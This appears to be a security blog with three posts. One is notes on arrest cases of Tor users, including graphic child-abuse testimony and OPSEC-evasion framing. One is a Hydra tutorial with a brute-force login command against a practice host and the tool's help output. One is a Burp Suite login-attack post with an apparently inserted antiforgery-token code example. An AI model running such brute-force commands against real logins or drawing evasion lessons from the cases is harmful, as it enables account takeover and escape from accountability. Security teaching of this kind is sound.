Tuesday, August 16, 2016

How Tor Users Got Caught Part 2 Cliff Notes

The following is just my notes for my video, How Tor Users Got Caught Part 2.

In the video I go over a handful of cases and explain what happened. The vast majority are human error: telling someone, or selling drugs through the postal service. There are other cases, however, where users were de-anonymized through operations like Operation Onymous, in which malicious relays were set up, and through other attacks that revealed users' IP addresses and servers. The last case walks through the investigation process police follow to identify someone. It is a good example of how thoroughly you need to cover your tracks, because it only takes one piece of evidence to unravel everything.

Unknown 14 year old: https://www.deepdotweb.com/2016/06/09/dark-net-bomb-threats-shut-florida-high-school-one-minor-arrested/

The 14-year-old boy was identified through investigation, by talking to students, teachers, and others to home in on the boy. A warrant was issued for the boy’s phone, and investigators discovered that he had been surfing the dark net.

“This student was so sophisticated with his knowledge that the phone he was using is what we call jail broken, which means it may look like a normal phone but if you put a certain password in, there is a completely different operating system. That is where he was able to secure services from the dark web. You can buy anything from bazookas to bomb threats. Other illegal activity occurs on that off the grid website,” investigators said.

Jacob Theodore George IV, a major early heroin vendor known as “digitalink” on Silk Road, was arrested in January 2012, after his packages had been repeatedly intercepted for at least the previous six months. George knew about the interceptions, but he bragged online about how he had sweet talked his way out of any problems. Some buyers were unconvinced—more than one called him an idiot and predicted his imminent arrest—but digitalink kept shipping heroin and a handful of other drugs out to customers until the cops knocked down his door. It is not clear from George's plea agreement how or exactly when authorities located him, but he granted investigators access to emails, shipping records and financial statements related to his business, according to the document.

BRIAN RICHARD FARRELL, 27, who used the moniker “DoctorClu”
FARRELL was one of the small staff of online administrators and forum moderators who assisted Blake Benthall with the day-to-day operation of the website. Benthall and this small staff controlled and oversaw all aspects of Silk Road 2.0, including, among other things: the computer infrastructure and programming code underlying the website; the terms of service and commission rates imposed on vendors and customers of the website; and the massive profits generated from the operation of the illegal business. FARRELL, operating under the moniker “DoctorClu,” was involved in activities such as approving new staff and vendors for the website, and organizing a denial of service attack on a competitor. When a search warrant was served at FARRELL’s Bellevue home, agents seized $35,000 in cash as well as silver bullion and various types of drug paraphernalia.

“As one of the key masterminds and coordinator of the Silk Road criminal marketplace, Farrell profited from the destruction of untold lives,” said Brad Bench, Special Agent in Charge of HSI Seattle. “Criminals who operate digital black markets and those who trade their illicit goods on them quite mistakenly believe they are above the law. It is one of HSI’s top priorities to shut down these hidden websites and bring their criminal operators and customers to justice.”


According to the complaint, when federal agents asked Farrell if he could help them identify other top people who had been involved with Silk Road 2.0, Farrell told them “You're not going to find much of a bigger fish than me.”

The US has charged Farrell with one count of conspiracy to distribute cocaine, heroin, and methamphetamine.

Special Agent Michael Larson described how the feds found Farrell in a deposition:
Between January 2014 and July 2014, a source of information provided law enforcement with particular IP addresses that had accessed the vendor portion of SR2 [Silk Road 2.0]. A user could not accidentally end up on the vendor portion of SR2. Rather, SR2 administrators/moderators restricted access to the vendor portion of the site to vendors who had conducted a certain amount of transactions. In addition, a user required a username and password to access the vendor portion of SR2.

At the end of July, Homeland Security Investigations in Seattle received a lead on one of the IP addresses and pulled Comcast records to find that the IP address matched the address of one of the investigators' cooperating witnesses. The cooperating witness (abbreviated as CW1 in the complaint) was roommates with Farrell, and said “that he/she had learned about the Silk Road and the 'dark net' from FARRELL,” adding that he was a “computer wizard” and maintained a server in the garage. Farrell also “obsessively” tracked his packages online and “babysat” the mailbox according to CW1's information.

The roommate also provided the feds with a box of Xanax pills that had been addressed to Farrell. On January 2, 2015, agents served a search warrant on Farrell's residence, and confiscated “various computer media, various prescription medications, drug paraphernalia, silver bullion bars valued at $3,900, and approximately $35,000 dollars.”

An FBI Source of Information (SOI) provided “reliable IP addresses for TOR and hidden services such as Silk Road 2.” Quite a few areas of the site were included, such as the main marketplace, the vendor section, the SR2 forum and the support interface.

The information the institute provided to the feds led to the location of the Silk Road 2 servers, which helped in the identification of “at least another seventeen black markets on TOR”. That refers to Operation Onymous, in which law enforcement authorities in several countries took down dark net marketplaces and scam sites in a synchronized operation.

That’s not all, however; the warrant goes on:
“The SOI also identified approximately 78 IP addresses that accessed a vendor .onion address,” it says, referring to the users of Silk Road 2.0.

When Farrell’s case was heard in court, the defense made this statement:
“On October 12, 2015, the government provided defense counsel a letter indicating that Mr. Farrell’s involvement with Silk Road 2.0 was identified based on information obtained by a ‘university-based research institute’ that operated its own computers on the anonymous network used by Silk Road 2.0.”

The defense also asked for more evidence on the academic institute that anonymously provided information to the FBI. After that, the defense made this statement:
“To date, the government has declined to produce any additional discovery.”

There is no proof, only speculation, but there is a chance that the group of relays that were trying to deanonymize Tor users was set up by the same university. The relays joined the network on January 30 and were removed by the Tor Project on July 4, the same interval during which the unnamed SOI provided information to the bureau. Nick Mathewson, co-founder of the Tor Project, made this statement regarding the case:

“If you’re doing an experiment without the knowledge or consent of the people you’re experimenting on, you might be doing something questionable—and if you’re doing it without their informed consent because you know they wouldn’t give it to you, then you’re almost certainly doing something wrong. Whatever you’re doing, it isn’t science.”

Farrell wasn’t the only one who had to appear in court on charges that came from the mysterious SOI. Gabriel Peterson-Siler, whose hearing was held on November 1, was charged with possession of child pornography. In June 2014, the same time interval in which Farrell’s IP address was provided to the FBI, an investigation into Peterson-Siler turned up an IP address that belonged to him. After his house was searched in September 2014, he was charged with possession of child pornography in April of this year and pleaded not guilty to all charges. Peterson-Siler’s defense requested the same information and evidence on the source that provided the IP address that led to his bust.

It is not confirmed, but there is a good chance that the SOI academic institute was Carnegie Mellon University, whose researchers have been paid at least $1 million by the FBI. The Tor Project published this in a blog post:

“Civil liberties are under attack if law enforcement believes it can circumvent the rules of evidence by outsourcing police work to universities. If academia uses “research” as a stalking horse for privacy invasion, the entire enterprise of security research will fall into disrepute. Legitimate privacy researchers study many online systems, including social networks — If this kind of FBI attack by university proxy is accepted, no one will have meaningful 4th Amendment protections online and everyone is at risk.”

On 5 November 2014, as the final piece of Operation Onymous, the operator of Silk Road 2, Blake Benthall / “Defcon” was arrested in San Francisco (press release; complaint). It is highly likely that the undercover agent Cirrus had enabled the locating of the SR2 server, which Benthall apparently had rented under his own name (possibly at his employer Close’s hosting), after which his Bitcoin spending (on a Tesla) was noted and surveillance correlated Defcon’s activities with Benthall’s; after being arrested, he “did admit to everything”.

On 6 November 2014, David & Teri Schell were arrested in California for selling marijuana and marijuana wax (complaint, PACER); additional coverage indicated they were investigated after “discovering an Internet Protocol address was accessing the Silk Road 2.0 site” and then PO box surveillance nailed them. The DoctorClu case reveals that the seller portal for SR2 had been used to de-anonymize a few IPs (but not many), implying that an undercover agent (presumably Cirrus) had inserted a de-anonymization exploit similar to the previous Freedom Hosting exploit. They were probably the SR1 & SR2 seller “CaliforniaCanibas” (profile).

Richard Armendariz worked as a U.S. Customs and Border Protection analyst for 42 years. Two days ago a federal judge denied Richard’s bond at a hearing. Armendariz, 69, was arrested as part of a massive investigation into child pornography on the dark net. The dark net is only accessible with Tor, a browser that allows you to view normal websites anonymously but also lets you access websites normal browsers can’t.

Armendariz, as testimonies have revealed, is related to former Texas Appellate judge Albert Armendariz Sr., who died in 2007. Sr. was a former civil rights leader and founder of the Mexican American Legal Defense and Educational Fund. Armendariz Sr. was also a federal immigration judge. During the time Richard Armendariz Sr. worked for the agency he was stationed in Miami, Florida, and in Colombia. He also had top-secret clearance.

When Richard retired five years ago he moved back to San Antonio, Texas, where his two sons live. He was one of 215,000 people the FBI has connected to a website it seized that made child porn available on the dark net. This is just one of the many arrests to be made in the FBI takeover of Playpen. The FBI’s investigation consisted of infecting the site with malware, gaining control of Playpen, and running it on their own servers for two weeks in order to trace the website’s users.
“There is a part of him that is completely unknown to his family. This man has had a demonstrated sexual interest in prepubescent children for 36 years,” Assistant U.S. Attorney Tracy Thompson told U.S. Magistrate Judge John Primomo during Tuesday’s hearing.

At the hearing there was also a woman who alleged Armendariz molested her in El Paso. The woman said the molestations happened from the time she was 11 years old, until she was in high school. She stated that she was 20 when she finally told her parents what Armendariz was doing to her.
“It changed everything in my life. It made it difficult to have healthy sexual relationships. I was acting out. Trust is a big issue…a lot of destructive behavior,” the woman said in court. The woman’s father confronted Armendariz in the late 80’s and the alleged molestations stopped. He was never charged with anything.

Jeff Baker, an FBI Special Agent, told the court that their Playpen investigation targeted Armendariz specifically at the beginning of May 2015. It wasn’t until September that FBI agents raided his home and confiscated his laptop and computer equipment. Baker also testified that “Playpen was the largest child porn ring in existence on the Tor network.”
Armendariz testified he had been searching for and viewing child pornography via the encrypted Tor network for three years. Armendariz’s attorney also told the Magistrate “Armendariz’s favorite section was toddlers. Some of it involved horrible sexual abuse; some of it is described as mutilation.”
With more than 117,000 posts and an average of 11,000 unique visitors a week, Playpen has proven to be one of the biggest sites on Tor. The investigation was kept secret until November, when a San Antonio newspaper reported that three local men had been charged in connection with it. It’s still unclear how many of the 1,300 people identified by their IP addresses have been arrested.

Jeff Baker spent quite a few years investigating child abuse and exploitation cases. He also testified that the content of Playpen was some of the worst child abuse material he had ever seen, including images and video of children of all ages being raped and tortured. Items confiscated from Armendariz’s home contained 800 images and 140 videos of child pornography to varying degrees.
Armendariz’s defense attorney argued that he was forthcoming with the FBI during the September raid on his home and admitted to being in possession of child pornography. Defense attorney Davis also argued that her client is not a danger to the community because there was no evidence that Armendariz had any kind of sexual interaction with children other than 30-year-old accusations. Magistrate Primomo agreed that Armendariz was not a flight risk, but believes he is a danger to the community.

“I’ve known Baker for a long time, and for him to say this is the worst that he has ever seen leaves a strong impression in my mind,” Primomo said. “The evidence of the molestation is uncontested. There is no indication of remorse. There is no indication of any apologies.” The judge went on to say that he couldn’t risk the possibility that Richard Armendariz would act out sexually with children if he were to release him on bond.

OPSEC Fail: Ex-Judge Arrested In Online Impersonation Case
Online impersonation is a crime in Texas, and former Judge Christopher Dupuy is being charged with two counts of it. In a case similar to that of Preston Alexander McWaters, the 43-year-old also has problems handling rejection from women.

You see, Dupuy had known a woman – let’s call her Jane – for 20 years and had dated her for 6 years until she ended the relationship in August 2014 and decided to marry someone else. That marriage didn’t work out and Jane got a divorce. She had Dupuy represent her in the divorce proceedings in which he at one point asked her if they could be in a relationship together again. Jane declined and he was angered by this.

Dupuy began aggressively stalking her on Facebook and making comments about other men she interacted with; he also saved pictures and sent them to her with derogatory remarks. Jane put up with this until her divorce was finalized in November 2014, then cut off all contact and ignored him. She told the investigating officer, Scott Hardcastle, that Dupuy had been harassing her ever since they broke up in August 2014.

In December 2014, he graduated from Facebook harassment to something more sinister. Jane began receiving several phone calls and text messages. Finally answering one of the calls, she found out that an advert on backpage.com was presenting her as a prostitute. The advert stated she charged $70 an hour. Jane told the Deputy she contacted that she isn’t a prostitute, didn’t post the advert, and didn’t give anyone permission to post the advert. She told the Deputy that she suspected Dupuy was behind this.

Hardcastle interviewed Jane in January 2015 where she told him what she told the Deputy. He then researched into Dupuy’s life and found out that he was a Judge. Six days later, he sent a subpoena to backpage.com and learned the user name, email address, home address, IP address, and credit card number of the account that posted the advert. The home address used was Jane’s and the account was associated with numerous IP addresses.

Apparently, the account made two adverts for the same person – Jane. One advert used a picture that Jane took while she was dating Dupuy and only sent to one person – Dupuy.
Hardcastle looked into the credit card number and, using a BIN checker, found that it was a Visa credit card. After contacting Visa, he was redirected to GreenDot, who told him it was a gift card that wasn’t registered to anyone, so they were of no help.

After that dead end, Hardcastle turned his attention toward the IP addresses. One is an IP address in Germany connected to the provider 23Media, and the other is an IP address in Venezuela connected to the provider Roya Hosting. He quickly determined that these IP addresses were VPNs.

When the Venezuelan national police cyber-crimes unit was contacted, they told Hardcastle that the address “resolves to the state owned telephone and internet company C’Amv” and “that this hosting service is designed to conceal the true location of the user and that there would be no further way to discover the identity of the user”.

Germany was of no help either: when Hardcastle reached out to Homeland Security to assist him, they told him that they weren’t able to trace the identity “due to the fact that Germany only retains IP Address logs for seven days”.

Hardcastle never determined which VPN service the IP addresses belonged to but the hosting providers have been associated with a few, including HideMyAss.  The Houston Press reports that Dupuy used HideMyAss but Hardcastle’s affidavit never states this.

And so, Hardcastle looked into the user name of the backpage account, “Don Tequila”. He determined that it was a false alias and was associated with a Facebook page that makes negative comments about Dupuy and hates him. Hardcastle moved onto the next piece of information associated with the backpage account – the email address, dontequila1900@hotmail.com.
A subpoena was issued to MSN Hotmail in late February 2015, and they responded with the requested information in May 2015. The name listed on the email address was Don Tequila, and it was registered using a VPN IP address in Germany.

However, a history of IP addresses associated with the email address was given as well. One of those IP addresses was located in League City, Texas, and provided by Comcast. Four days later, a subpoena was sent to Comcast and – surprise, surprise – the records show that the subscriber for that IP address is Christopher Dupuy.

A search warrant was executed in June 2015 for Dupuy’s residence, and when his door was kicked in, he was found in the kitchen. When asked to put his hands up, a bullet fell from his hand. Hardcastle asked for the gun and Dupuy complied and told him where it was. He found a 9mm pistol.
While Dupuy’s residence was searched, a bag was found in his bathroom hidden between the toilet and bathtub. 

Dupuy was charged with two counts of online impersonation and his bail was set at $600,000 but was later reduced to $400,000.

Robot Arrested: http://www.cnbc.com/2015/04/21/robot-with-100-bitcoin-buys-drugs-gets-arrested.html

Teenager Arrested for Trying To Buy Glock Pistol From The Dark Web
Megan Schadeberg (19), from Carmarthenshire, had attempted to buy a Glock handgun from the dark web and said she wanted to “kill herself and kill the world”, according to the court. During the house search, police found books on mass shootings in which the girl had made notes. They also found a diary in which Schadeberg said that she “hated everyone” and “did not feel anything for other people”.
On the 19-year-old’s iPhone, the law enforcement authorities found the link of a dark net marketplace where Schadeberg put a Glock G21 and ammunition for it in a shopping basket and uploaded £240 in Bitcoins to a wallet, which she could use for a down payment for the weapon and the bullets.
Schadeberg pleaded guilty to the attempt of buying a prohibited weapon in October last year when she appeared in the dock of Swansea Crown Court last week. According to official court documents, her plan to buy a gun came to light after she told a psychiatrist about it who then alerted police.
The court also heard that Schadeberg was suffering from “some form of psychotic illness”. According to Craig Jones, from defense, the girl’s actions had been “a cry for help”.
Judge Paul Thomas QC described the case as “terribly sad and also very worrying” and he made a hospital order detaining the teenager so she could be treated.


Introducing human error
In 2011, the Dark Net’s first drug markets opened up for business.

Silk Road, Black Market Reloaded, and the Farmer’s Market transformed the illicit goods industry within months of migrating to the anonymous Tor network. While the markets flourished quickly, the arrests actually began quietly the same year that Silk Road started.

An as-yet-unnamed confidential source gave federal investigators a crash course in how Silk Road worked in November 2011. He also gave them access to a vendor’s account, as well as the names and addresses of Silk Road customers around the world.
In 2012, the arrests became more prominent.

Over the next two years, dozens of dealers and customers were arrested for drug operations on the Dark Net. The cause wasn’t Tor itself—the most obvious common denominator—it was human error.
George’s shipments, and those by others like him, were caught and flagged while they were being mailed. Many had poor “stealth” for their packages, making them easily detected by postal workers and drug dogs.

Even some of Silk Road’s biggest operations have been brought down via the postal service. Deep Web heroin kingpin Steven Lloyd Sadler and his partner-in-crime girlfriend, Jenna White, sold heroin, cocaine, and meth by the bundle on the Dark Net, shipping high-quality product at premium prices to earn over $105,000 per month. But White was flagged by postal workers after she parked in front of security cameras at post offices, bought masses of stamps at once, and visited often enough to be identified as the woman with handwriting identical to those found on intercepted packages containing heroin.

Dark Net drug dealers don’t just make mistakes in the regular mail. They also make them in email.
In April 2012, the Farmer’s Market (TFM) was shuttered and its administrators arrested after a two-year investigation by the Drug Enforcement Agency.

TFM, which had been operating for at least six years online, had only recently made the move to Tor in order to improve security. TFM’s owners also used Hushmail, a Canadian operation that advertises itself as powerfully encrypted private email. The problem was that Hushmail itself could decrypt the emails, so when police subpoenaed the company, every single email was an open book for law enforcement.

When Silk Road fell in 2013, the arrests of dozens of Tor users for drug offenses were made public all at once. Many wondered, in the wake of Edward Snowden’s NSA leaks, if the program itself was broken.

Even today, months after Ross Ulbricht was sentenced to life in prison, there are still many unanswered questions about his arrest. The FBI claims that the black market accidentally gave up its location due to trivial but profound mistakes made by Ulbricht when he configured Tor for the hidden service he operated. Critics among the information security community, however, believe the FBI hacked in by attacking Silk Road with unexpected commands and forcing the server to mistakenly give up its location.

The speculation surrounding the specifics of Silk Road’s fall have persisted even through Ulbricht’s surprisingly fast trial in February 2015.

In almost all the cases we know about, it’s trivial mistakes that tend to unintentionally expose Tor users.

Several top Silk Road administrators were arrested because they gave proof of identity to Dread Pirate Roberts, data that was owned by the police when Ulbricht was arrested. Giving your identity away, even to a trusted confidant, is always a huge mistake.

A major meth dealer’s operation was discovered after the IRS started investigating him for unpaid taxes, and an OBGYN who allegedly sold prescription pills used the same username on Silk Road that she did on eBay.

Likewise, the September 2014 arrest of a pedophile could be traced to his use of “gateway sites” (such as Tor2Web), which allow users to access the Deep Web but, contrary to popular belief, do not offer the anonymizing power of Tor.

“There’s not a magic way to trace people [through Tor], so we typically capitalize on human error, looking for whatever clues people leave in their wake,” James Kilpatrick, a Homeland Security Investigations agent, told the Wall Street Journal.

Tor isn’t perfect. It’s an ambitious piece of open-source software run off of grants and donations that is constantly under scrutiny from all corners. The regular security updates and constant work that goes into the product prove that there is still work to be done.

Tor’s greatest Achilles’ heel, however, remains its users.

When Tor users are arrested, “it usually does not involve the core technology being cracked or being hacked in any way,” Nik Cubrilovic, an Australian cybersecurity consultant, told Politico. “It’s usually something else.”

Hackers with a badge
On the morning of Aug. 3, 2013, every site hosted by Freedom Hosting crashed.
Freedom Hosting was the most popular hosting service on the Deep Web, described by the FBI as the “largest facilitator of child porn on the planet.” It was even the target of attacks from groups like the hacker collective Anonymous.

The fall of Freedom Hosting—a case that is still in its early stages—is one of the big question marks in Tor history. The case has moved slowly due to its international nature, and police have revealed precious little about how they found Freedom Hosting and arrested its alleged owner, Irishman Eric Eoin Marques.

Source: http://kernelmag.dailydot.com/issue-sections/features-issue-sections/13606/tor-arrest-history/

Huge List:

On 26 September 2014, the 21yo South Australia man Ryan James Norman was arrested while picking up a package from the post office after Customs intercepted a shipment of ~5000 doses of 25i-NBOMe from Canada; he was sentenced in September 2015 to 3.5 years. It later emerged that he was a seller on SR2; I have identified Norman as the SR2 seller “MagicAU” based on similar products and MagicAU vanishing from SR2 during 26-28 September 2014, immediately after Norman was raided, and MagicAU’s relatively young vendor age which matches the description of Norman as having sold for ~2 months before being arrested.

During April 2015, a 40yo German man in Würzburg was arrested for purchases of MDMA, cocaine, amphetamines, cannabis & “synthetic” drugs totaling kilograms off of SR2 (he does not seem to have been a SR2 seller, indicating he was a local reseller) and earlier markets starting in 2012. The investigation appears to have relied on FBI forensic analysis of the seized SR2 server’s PMs (he, like many, apparently had not been using PGP in communicating with his sellers) and also German customs intercepts of several orders.

In early May 2014, the SR2 seller “Xanax King” (Jeremy Donagal) & his associates were arrested (DEA press release); he ran a very large operation with multiple employees, purchased ingredients using Western Union & wire transfers to China, “sold drugs locally, distributing Xanax tablets, GHB, and steroids”, some sort of clearnet website (xkloves.us, content removed in lieu of a now-defunct Tor hidden service), and had at least one “confidential informant” in his organization (see the anti-bail letter), who was handling their SR2 orders at the end according to a media report (some buyers reported being asked to resend their PGP-encrypted addresses).

The fallout from XK’s bust has been substantial: the anti-bail letter claims “In addition to the nine defendants in this case, evidence gathered from Defendant’s enterprise led to the arrest of nearly 60 other people throughout the country”. Several of his customers received controlled deliveries and have been arrested as well. 2 controlled deliveries on 28 May picked up 4 men in Bloomington, Indiana (Carlos Matthew Allen, David Christian Feigel, Paul Furto, & Andrew C. Dickey). Kory D. Kreider in New Orleans, Louisiana, whose pickup of a package was surveilled, managed to evade arrest on 29 May but was arrested a few days later using cellphone records & Facebook data. Some other CDs in late May/early June 2014 are highly likely to be XK-related. In Naperville, Illinois, Brian Patrick Noone was arrested on 30 May 2014 after a search warrant yielded 600 Xanax pills, apparently based on “a tip from a federal task force about drug trafficking in Naperville”. In Nashville, Tennessee, 3 people (Demarcus Blue, Markuite Matthews, & Adrevious Rayner) were arrested after a CD on 29 May 2014 of 5000 gel cap Xanax pills sent by “An alleged drug ring” shipping from California, and the mailer “was taken into custody at the end of last week”.

In “last fall” (Fall 2014), US Air Force cadet Nathaniel Penalosa’s dorm room was searched and a military investigation was opened into his sale of drugs to fellow students at the USAF academy, including LSD, molly/methylenedioxy-methamphetamine, and modafinil. He had ordered them via mail from Silk Road 2. His court-martial began around August 2015, leading to the expulsion of 3 other cadets, and he accepted a plea-bargain for 3 years.

In November 2014, 37yo Louisiana man Michael Munro Jr. was arrested for importing Xanax & oxycodone bought on SR2 since March 2014.

The Washington man Brian Farrell, SR2 staffer “DoctorClu”, was arrested 20 January 2015; his IP had been uncovered in July 2014 accessing the SR2 seller portal, like CaliforniaCanibas, by CMU researchers, and the information was turned over to the FBI. The local police investigated by post-office checks and then interviewed him & his roommate on 22 December 2014; the roommate spoke freely about Farrell’s drug use and online connections and the next day even provided some of Farrell’s drugs to the police, allowing a search warrant to search the house and uncover Farrell’s prescription drugs on 2 January 2015, at which point he confessed everything & to helping run SR2 as the employee DoctorClu and was then arrested (the charges being upgraded from local pill charges to federal conspiracy charges; complaint). He was sentenced to 8 years in June 2016.

Follow me on Twitter, @gFogerlie (https://twitter.com/gfogerlie), Google+ https://plus.google.com/+GarrettFogerlie and Facebook https://www.facebook.com/garrett.fogerlie

Subscribe: http://www.youtube.com/subscription_center?add_user=GarrettFogerlie

Have a video request? Let me know: https://www.youtube.com/user/GarrettFogerlie/discussion

Tuesday, April 12, 2016

Detailed Explanation of Hydra's Syntax for Web Form Attacks

This article will break down the syntax we used for Hydra in the article Brute forcing a website login form using Hydra and the video Brute Force Website Login Attack Using Hydra.

In general you can usually type 'man' followed by the program name to read the manual. However, hydra doesn't have a manual; just typing 'hydra' will show you the basic info, or 'hydra -h' for more info. Below is the basic help. One of the best commands for detailed help with a module is to use the '-U' option followed by the module name. Here are all the modules:

asterisk cisco cisco-enable cvs ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql(v4) nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] rdp redis rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 teamspeak telnet[s] vmauthd vnc xmpp 
So here is the command I used:
hydra -l root -p 557 -v attack.samsclass.info http-get-form "/brute4.php:login=^USER^&pin=^PASS^:Denied"

To start we have the program name, hydra, followed by -l userName or -L userNameFile.txt. The -l option is for a login name. Then we have -p password or -P passwordFile.txt; this is for the password or password file. The -v is optional; it stands for verbose (it is an option that almost all programs have, and can come in handy to see what's happening). Verbose just means that it will show you a lot of information that would not normally be shown (you can read more by running hydra -h).

Next we have attack.samsclass.info. This is the domain name we will be attacking; don't include the http:// or https://, and don't include anything past or including the / after the name.

Now we have the service module to run, in this case http-get-form. This tells hydra that it will be attacking an http web form by making a GET request (most forms use POST, just FYI). You can learn a ton more by running 'hydra -U http-get-form'. Here is a quote of what it says:

The parameters take three ":" separated values, plus optional values.
(Note: if you need a colon in the option string as value, escape it with "\:", but do not escape a "\" with "\\".)

Syntax:   <url>:<form parameters>:<condition string>[:<optional>[:<optional>]
First is the page on the server to GET or POST to (URL).
Second is the POST/GET variables (taken from either the browser, proxy, etc.
 with usernames and passwords being replaced in the "^USER^" and "^PASS^"
 placeholders (FORM PARAMETERS)
Third is the string that it checks for an *invalid* login (by default)
 Invalid condition login check can be preceded by "F=", successful condition
 login check must be preceded by "S=".
 This is where most people get it wrong. You have to check the webapp what a
 failed string looks like and put it in this parameter!

Next we have the three required parameters in quotes separated by a colon ':', "/brute4.php:login=^USER^&pin=^PASS^:Denied". So first is the URL that the form posts to, /brute4.php. Then the posted query string or options, login=^USER^&pin=^PASS^. This is what the form submits; if you look at a form, these would be the names of any input, checkbox etc.

Here we have 'login' and 'pin'. Hydra replaces ^USER^ with the username or usernames from the username file, and it replaces ^PASS^ with the provided password or passwords from the password file. Finally we have the third required parameter, Denied; this is the text to look for to know the login failed. In our case it is Denied, but this will be different for different sites. Optionally you can look for a successful login text, something that is only shown when you successfully log in. You can do this with an 'S=' followed by the text. An example of a successful login text may be the username, as some sites show the username once you log in.

Hopefully this has helped you understand what each part of the syntax we used does. Here is the full help for the http-get-form module:
Help for module http-get-form:
============================================================================
Module http-get-form requires the page and the parameters for the web form.

By default this module is configured to follow a maximum of 5 redirections in
a row. It always gathers a new cookie from the same URL without variables

The parameters take three ":" separated values, plus optional values.
(Note: if you need a colon in the option string as value, escape it with "\:", but do not escape a "\" with "\\".)

Syntax:   <url>:<form parameters>:<condition string>[:<optional>[:<optional>]
First is the page on the server to GET or POST to (URL).
Second is the POST/GET variables (taken from either the browser, proxy, etc.
 with usernames and passwords being replaced in the "^USER^" and "^PASS^"
 placeholders (FORM PARAMETERS)
Third is the string that it checks for an *invalid* login (by default)
 Invalid condition login check can be preceded by "F=", successful condition
 login check must be preceded by "S=".
 This is where most people get it wrong. You have to check the webapp what a
 failed string looks like and put it in this parameter!
The following parameters are optional:
 C=/page/uri     to define a different page to gather initial cookies from
 (h|H)=My-Hdr\: foo   to send a user defined HTTP header with each request
                 ^USER^ and ^PASS^ can also be put into these headers!
                 Note: 'h' will add the user-defined header at the end
                 regardless it's already being sent by Hydra or not.
                 'H' will replace the value of that header if it exists, by the
                 one supplied by the user, or add the header at the end
Note that if you are going to put colons (:) in your headers you should escape them with a backslash (\).
 All colons that are not option separators should be escaped (see the examples above and below).
 You can specify a header without escaping the colons, but that way you will not be able to put colons in the header value itself, as they will be interpreted by hydra as option separators.

Examples:
 "/login.php:user=^USER^&pass=^PASS^:incorrect"
 "/login.php:user=^USER^&pass=^PASS^&colon=colon\:escape:S=authlog=.*success"
 "/login.php:user=^USER^&pass=^PASS^&mid=123:authlog=.*failed"
 "/:user=^USER&pass=^PASS^:failed:H=Authorization\: Basic dT1w:H=Cookie\: sessid=aaaa:h=X-User\: ^USER^"
 "/exchweb/bin/auth/owaauth.dll:destination=http%3A%2F%2F<target>%2Fexchange&flags=0&username=<domain>%5C^USER^&password=^PASS^&SubmitCreds=x&trusted=0:reason=:C=/exchweb"

Saturday, March 12, 2016

Using Burp Suite To Attack Website Logins - Video

This video shows you how to use Burp Suite to intercept login form posts, alter them in Burp Suite's Intruder and launch an automated attack that will work against most websites. In the video we attack a website that has an antiforgery token hidden in the form. This, along with a tracking cookie that is submitted with the form, prevents the server from even attempting to validate the login if these tokens don't match. This will prevent tools like Hydra from effectively hacking the login.

Here is the code that is run on the server when the Login Form is Posted:

As you can see, the AntiForgeryToken is checked before the server even enters the Login Action. Therefore if this token fails, the server will never even attempt to process the login.
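The server code from the video is not reproduced on this page, so here is an added illustration of the mechanism it describes, written for this post and not taken from the video's application: a hidden-field token bound to a cookie by an HMAC, checked before the login action runs, so that a form replayed without its matching cookie is rejected without the credentials ever being looked at. SERVER_KEY, the 'antiforgery' cookie/field name, demo_credentials and the request dictionaries are all constructed for the example.

```python
"""Antiforgery (CSRF) token check that runs before the login logic.

Added example, not the server code from the video: it shows the mechanism the
post describes, a token in a hidden form field bound to a cookie, with the
login action never being reached when the pair does not match. All names
(SERVER_KEY, the 'antiforgery' cookie/field name, demo_credentials) are
constructed for this example.
"""
import hashlib
import hmac
import secrets
from typing import Callable, Dict, Mapping, Optional, Tuple

# Constructed key; a real deployment loads it from its secret store.
SERVER_KEY = b"constructed-demo-key-rotate-me"
TOKEN_NAME = "antiforgery"   # constructed name for both the cookie and the hidden field


def issue_antiforgery_pair() -> Tuple[str, str]:
    """Return (cookie_value, hidden_field_value) for a freshly served form.
    The field is an HMAC over the cookie, so the two only verify together:
    a form posted without the cookie it was issued with cannot pass."""
    cookie = secrets.token_urlsafe(32)
    hidden = hmac.new(SERVER_KEY, cookie.encode(), hashlib.sha256).hexdigest()
    return cookie, hidden


def antiforgery_valid(cookie_value: Optional[str], field_value: Optional[str]) -> bool:
    """True only when both halves are present and the field matches the cookie."""
    if not cookie_value or not field_value:
        return False
    expected = hmac.new(SERVER_KEY, cookie_value.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, field_value)


def handle_login_post(cookies: Mapping[str, str], form: Mapping[str, str],
                      check_credentials: Callable[[str, str], bool]) -> Dict[str, object]:
    """Order matters: the token check happens first, and on failure the
    credential check (the post's 'Login Action') is never invoked. That is
    what stops a tool replaying the form without the matching cookie."""
    if not antiforgery_valid(cookies.get(TOKEN_NAME), form.get(TOKEN_NAME)):
        return {"status": 400, "credentials_checked": False}
    ok = check_credentials(form.get("user", ""), form.get("password", ""))
    return {"status": 200 if ok else 401, "credentials_checked": True}


def demo_credentials(user: str, password: str) -> bool:
    """Constructed credential store standing in for the real user database."""
    return user == "root" and password == "557"


if __name__ == "__main__":
    cookie, hidden = issue_antiforgery_pair()
    good = handle_login_post({TOKEN_NAME: cookie},
                             {TOKEN_NAME: hidden, "user": "root", "password": "557"},
                             demo_credentials)
    # Same form fields replayed without the cookie: rejected before any lookup.
    replay = handle_login_post({}, {TOKEN_NAME: hidden, "user": "root", "password": "557"},
                               demo_credentials)
    print(good, replay)
```

The design point is the ordering in handle_login_post: because the token is verified before anything touches the credential store, a guessing tool that only resubmits the form fields gets a 400 on every attempt and never exercises the password check, which is the behaviour the video relies on to defeat Hydra and which Burp's Intruder has to work around by refreshing the token and cookie each round.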

While this video shows a method that will work against most websites, my company designs secure web applications that can mitigate such an attack. If you are interested in learning more about the applications we design, please email Garrett Fogerlie